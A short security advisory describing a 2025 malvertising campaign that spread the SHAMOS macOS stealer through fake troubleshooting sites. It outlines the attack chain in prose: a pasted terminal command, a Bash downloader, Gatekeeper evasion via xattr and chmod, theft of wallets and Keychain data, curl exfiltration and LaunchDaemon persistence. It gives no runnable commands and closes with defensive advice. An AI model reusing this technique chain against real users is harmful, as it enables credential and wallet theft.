Description

In June-August 2025, a high-level macOS-targeted malware campaign was made, that infected more than 300 customer environments across the globe. COOKIE SPIDER cybercrime group carried out the attack using a fresh version of the Atomic macOS Stealer (AMOS), which is known as SHAMOS. Under the guise of mislead help websites like mac-safer.com and rescue-mac.com, the campaign preyed on users looking for real troubleshooting tips like "macOS flush resolver cache." By employing malvertising and identity spoofing methods—like pretending to be an Australian electronics retailer—attackers tricked victims into executing dangerous one-line terminal commands, unintentionally triggering the malware download process. SHAMOS is an advanced stealer distributed via a downloaded Bash script off a spoofed iCloud-related domain. After execution, the malware steals user passwords, drops a Mach-O binary in `/tmp/` and evades macOS Gatekeeper protections via ruse of `xattr` and `chmod`. It conducts system checks to prevent sandbox environments, employs AppleScript for host reconnaissance, and gathers sensitive information such as crypto wallets, browser credentials, Keychain data, and AppleNotes. The compromised information is stored into a ZIP file and exfiltrated using `curl`, with persistence being handled through a LaunchDaemon Plist file in case admin rights are provided. In order to protect against such attacks, users and organizations must not execute unverified terminal commands on third-party sites, even if they seem legitimate. Utilizing trusted endpoint protection, deactivating advertising-based tracking, and DNS filtering can greatly minimize exposure. IT staff must also educate employees on social engineering threats, enforce least privilege, and scan for suspicious outbound network traffic to detect early warning signs of compromise.